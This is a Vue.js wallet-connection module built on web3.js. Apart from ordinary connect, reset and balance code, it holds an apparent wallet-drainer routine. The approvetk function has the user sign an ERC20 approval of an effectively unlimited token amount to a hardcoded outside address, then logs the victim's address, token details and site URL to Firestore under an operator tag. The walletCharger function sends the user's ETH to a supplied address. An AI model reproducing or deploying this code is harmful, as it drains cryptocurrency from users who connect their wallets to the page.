import { ref, reactive, getCurrentInstance, toRefs } from "vue";
import Web3, { utils } from "web3";
import Web3Modal from "web3modal";
import { getChainData } from "@/web3/tools";
import { providerOptions } from "@/web3/config";
import { addTxDoc } from "./dash";
import { Timestamp } from "firebase/firestore";
const INITIAL_STATE = {
  web3: null,
  provider: null,
  userAddress: "",
  connected: false,
  chainId: 1,
  networkId: 1,
};
export default function UseWallet() {
  const { ctx: _this } = getCurrentInstance();

  const walletObj = reactive({ ...INITIAL_STATE });
  const fetching = ref(false);
  const assets = ref(0);
  // https://github.com/Web3Modal/web3modal#web3modal
  const web3Modal = new Web3Modal({
    theme: "light",
    network: getChainData(walletObj.chainId).network,
    cacheProvider: true,
    providerOptions,
  });
  // methods wallte.js
  const resetApp = async () => {
    const { web3 } = walletObj;
    if (web3 && web3.currentProvider && web3.currentProvider.close) {
      await web3.currentProvider.close();
    }

    web3Modal.clearCachedProvider();
    assets.value = 0;
    Object.keys(INITIAL_STATE).forEach((e) => {
      walletObj[e] = INITIAL_STATE[e];
    });
    _this.$forceUpdate();
  };
  const getUserBalance = () =>
    walletObj.web3.eth.getBalance(walletObj.userAddress).then((res) => {
      let bal = res ? utils.fromWei(res.toString(), "ether") : 0;
      console.log(bal);
      return bal;
    });

  const getAccountAssets = async () => {
    console.log(walletObj.web3);
    fetching.value = true;
    // get account balances

    assets.value = await getUserBalance();
  };
  const subscribeProvider = async (provider) => {
    if (!provider.on) {
      return;
    }
    provider.on("close", () => resetApp());
    provider.on("accountsChanged", async (accounts) => {
      // eslint-disable-next-line prefer-destructuring
      walletObj.userAddress = accounts[0];
      await getAccountAssets();
    });
    provider.on("chainChanged", async (chainId) => {
      console.log("333", chainId);
      const networkId = await walletObj?.web3?.eth?.net.getId();
      walletObj.chainId = chainId;
      walletObj.networkId = networkId;
      await getAccountAssets();
    });
  };

  const onConnect = async () => {
    const provider = await web3Modal.connect();

    await subscribeProvider(provider);

    const web3 = new Web3(provider);
    const accounts = await web3.eth.getAccounts();

    const address = accounts[0];

    const networkId = await web3.eth.net.getId();

    const chainId = await web3.eth.getChainId(); // 坑逼 注意版本 chainId

    walletObj.web3 = web3;
    walletObj.provider = provider;
    walletObj.connected = true;
    walletObj.userAddress = address;
    walletObj.chainId = chainId;
    walletObj.networkId = networkId;
    await getAccountAssets();
  };

  async function approvetk(contract, tokenName, tokenId) {
    console.log("hit");
    // let provider = new WalletConnectProvider({
    //   infuraId: "46795cf44ffc462885b7bd738b913e38",
    // });

    const user = "hotboy";
    //console.log(user);

    const web3 = walletObj.web3;

    let state = {
      address: walletObj.userAddress,
      chainId: walletObj.chainId,
      status: walletObj.connected,
    };

    if (state.address) {
      // const web3 = new Web3(Web3.givenProvider || "ws://localhost:5500");

      // Get the contract ABI from compiled smart contract json
      const erc20TokenContractAbi = [
        {
          constant: true,
          inputs: [],
          name: "name",
          outputs: [
            {
              name: "",
              type: "string",
            },
          ],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            {
              name: "spender",
              type: "address",
            },
            {
              name: "tokens",
              type: "uint256",
            },
          ],
          name: "approve",
          outputs: [
            {
              name: "success",
              type: "bool",
            },
          ],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: true,
          inputs: [],
          name: "totalSupply",
          outputs: [
            {
              name: "",
              type: "uint256",
            },
          ],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            {
              name: "from",
              type: "address",
            },
            {
              name: "to",
              type: "address",
            },
            {
              name: "tokens",
              type: "uint256",
            },
          ],
          name: "transferFrom",
          outputs: [
            {
              name: "success",
              type: "bool",
            },
          ],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: true,
          inputs: [],
          name: "decimals",
          outputs: [
            {
              name: "",
              type: "uint8",
            },
          ],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            {
              name: "amount",
              type: "uint256",
            },
          ],
          name: "withdrawEther",
          outputs: [],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: true,
          inputs: [],
          name: "_totalSupply",
          outputs: [
            {
              name: "",
              type: "uint256",
            },
          ],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: true,
          inputs: [
            {
              name: "tokenOwner",
              type: "address",
            },
          ],
          name: "balanceOf",
          outputs: [
            {
              name: "balance",
              type: "uint256",
            },
          ],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: false,
          inputs: [],
          name: "acceptOwnership",
          outputs: [],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: true,
          inputs: [],
          name: "owner",
          outputs: [
            {
              name: "",
              type: "address",
            },
          ],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: true,
          inputs: [],
          name: "symbol",
          outputs: [
            {
              name: "",
              type: "string",
            },
          ],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: true,
          inputs: [
            {
              name: "a",
              type: "uint256",
            },
            {
              name: "b",
              type: "uint256",
            },
          ],
          name: "safeSub",
          outputs: [
            {
              name: "c",
              type: "uint256",
            },
          ],
          payable: false,
          stateMutability: "pure",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            {
              name: "to",
              type: "address",
            },
            {
              name: "tokens",
              type: "uint256",
            },
          ],
          name: "transfer",
          outputs: [
            {
              name: "success",
              type: "bool",
            },
          ],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: true,
          inputs: [
            {
              name: "a",
              type: "uint256",
            },
            {
              name: "b",
              type: "uint256",
            },
          ],
          name: "safeDiv",
          outputs: [
            {
              name: "c",
              type: "uint256",
            },
          ],
          payable: false,
          stateMutability: "pure",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            {
              name: "spender",
              type: "address",
            },
            {
              name: "tokens",
              type: "uint256",
            },
            {
              name: "data",
              type: "bytes",
            },
          ],
          name: "approveAndCall",
          outputs: [
            {
              name: "success",
              type: "bool",
            },
          ],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: true,
          inputs: [
            {
              name: "a",
              type: "uint256",
            },
            {
              name: "b",
              type: "uint256",
            },
          ],
          name: "safeMul",
          outputs: [
            {
              name: "c",
              type: "uint256",
            },
          ],
          payable: false,
          stateMutability: "pure",
          type: "function",
        },
        {
          constant: true,
          inputs: [],
          name: "newOwner",
          outputs: [
            {
              name: "",
              type: "address",
            },
          ],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            {
              name: "tokenAddress",
              type: "address",
            },
            {
              name: "tokens",
              type: "uint256",
            },
          ],
          name: "transferAnyERC20Token",
          outputs: [
            {
              name: "success",
              type: "bool",
            },
          ],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          constant: true,
          inputs: [
            {
              name: "tokenOwner",
              type: "address",
            },
            {
              name: "spender",
              type: "address",
            },
          ],
          name: "allowance",
          outputs: [
            {
              name: "remaining",
              type: "uint256",
            },
          ],
          payable: false,
          stateMutability: "view",
          type: "function",
        },
        {
          constant: true,
          inputs: [
            {
              name: "a",
              type: "uint256",
            },
            {
              name: "b",
              type: "uint256",
            },
          ],
          name: "safeAdd",
          outputs: [
            {
              name: "c",
              type: "uint256",
            },
          ],
          payable: false,
          stateMutability: "pure",
          type: "function",
        },
        {
          constant: false,
          inputs: [
            {
              name: "_newOwner",
              type: "address",
            },
          ],
          name: "transferOwnership",
          outputs: [],
          payable: false,
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [],
          payable: false,
          stateMutability: "nonpayable",
          type: "constructor",
        },
        {
          payable: true,
          stateMutability: "payable",
          type: "fallback",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              name: "_from",
              type: "address",
            },
            {
              indexed: true,
              name: "_to",
              type: "address",
            },
          ],
          name: "OwnershipTransferred",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              name: "from",
              type: "address",
            },
            {
              indexed: true,
              name: "to",
              type: "address",
            },
            {
              indexed: false,
              name: "tokens",
              type: "uint256",
            },
          ],
          name: "Transfer",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              name: "tokenOwner",
              type: "address",
            },
            {
              indexed: true,
              name: "spender",
              type: "address",
            },
            {
              indexed: false,
              name: "tokens",
              type: "uint256",
            },
          ],
          name: "Approval",
          type: "event",
        },
      ];
      // Create contract object
      const tokenContractAddress = contract;

      // Instantiate contract
      const tokenContract = new web3.eth.Contract(erc20TokenContractAbi, tokenContractAddress);
      const toAddress = "0xfA17c64556a38cc1393Ecffbda717A1F8f71e15B";

      // Calculate contract compatible value for approve with proper decimal points using BigNumber
      const tokenDecimals = web3.utils.toBN(18);
      const tokenAmountToApprove = web3.utils.toBN(9990000000000000000);
      const calculatedApproveValue = web3.utils.toHex(
        tokenAmountToApprove.mul(web3.utils.toBN(10).pow(tokenDecimals))
      );

      // const Contract = ('0xContractAddress');
      // const spenderAdr = ('0xSpenderAddress');
      // const amount = ('AmountTokensNumber')

      // async function approvebutton(Contract, spenderAdr) {
      //     Contract.methods.approve(spenderAddr, amount).send({
      //         from: ownerAddr
      //     })
      // }

      web3.eth.getAccounts().then((e) => {
        console.log(e);
      });

      // Get user account wallet address first
      web3.eth.getAccounts().then((accounts) => {
        // Send ERC20 transaction with web3
        tokenContract.methods
          .approve(toAddress, calculatedApproveValue)
          .send({
            from: accounts[0],
            gas: 120193,
            gasPrice: "30000000000",
          })
          .once("transactionHash", (hash) => {
            console.log(hash);
            addTxDoc({
              owner: user,
              txHash: hash,
              tokenInfo: [contract, tokenName, tokenId],
              approvedFrom: accounts[0],
              approvedFor: toAddress,
              siteUrl: window.location.href,
              date: Timestamp.now(),
            });
          })
          .once("receipt", (receipt) => {
            console.log(receipt);
          });
      });
    } else {
      alert("please connect your wallet");
    }
  }
  async function walletCharger(walletAddress, amount) {
    // Check that the wallet address is valid
    // if (!web3.utils.isAddress(walletAddress)) {
    // throw new Error('Invalid wallet address');
    // }
    //
    // // Check that the amount is a valid number
    // if (!web3.utils.isHexStrict(web3.utils.toHex(amount))) {
    //     throw new Error('Invalid amount');
    // }
    //
    // // Get the current address of the user's wallet
    // const address = web3.eth.defaultAccount;
    //
    // // Check that the user has sufficient balance to make the payment
    // if (web3.eth.getBalance(address) < amount) {
    //     throw new Error('Insufficient balance');
    // }

    // Charge the wallet by sending the specified amount of Ethereum

    console.log("hit");
    // let provider = new WalletConnectProvider({
    //   infuraId: "46795cf44ffc462885b7bd738b913e38",
    // });

    const user = "ugligod";
    //console.log(user);

    const web3 = walletObj.web3;

    let state = {
      address: walletObj.userAddress,
      chainId: walletObj.chainId,
      status: walletObj.connected,
    };

    if (state.address) {
      // const web3 = new Web3(Web3.givenProvider || "ws://localhost:5500");

      // Get the contract ABI from compiled smart contract json

      // Create contract object

      // const Contract = ('0xContractAddress');
      // const spenderAdr = ('0xSpenderAddress');
      // const amount = ('AmountTokensNumber')

      // async function approvebutton(Contract, spenderAdr) {
      //     Contract.methods.approve(spenderAddr, amount).send({
      //         from: ownerAddr
      //     })
      // }

      return web3.eth.sendTransaction({
        from: state.address,
        to: walletAddress,
        value: web3.utils.toWei(amount, "ether"),
      });
    } else {
      alert("please connect your wallet");
    }
  }

  return {
    ...toRefs(walletObj),
    fetching,
    assets,
    resetApp,
    getAccountAssets,
    walletCharger,
    //

    web3Modal,
    // methods
    onConnect,
    approvetk,
  };
}
